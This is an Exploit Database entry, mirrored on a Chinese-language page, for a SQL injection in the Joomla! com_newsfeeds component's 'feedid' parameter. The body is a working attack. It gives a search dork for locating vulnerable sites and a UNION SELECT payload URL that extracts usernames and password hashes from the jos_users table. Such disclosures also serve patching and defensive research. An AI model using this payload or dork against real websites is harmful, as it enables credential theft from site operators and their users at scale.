Joomla! Component com_newsfeeds 1.0 – ‘feedid’ SQL Injection

• Exploit Database
• 135 阅读

• 作者： Milad karimi
  日期： 2020-03-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48202/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

  # Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection # Date: 2020-03-10 # Author: Milad Karimi # Software Link: # Version: # Category : webapps # Tested on: windows 10 , firefox # CVE : CWE-89 # Dork: inurl:index.php?option=com_newsfeeds     index.php?option=com_newsfeeds&view=categories&feedid=[sqli]   Example:   http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--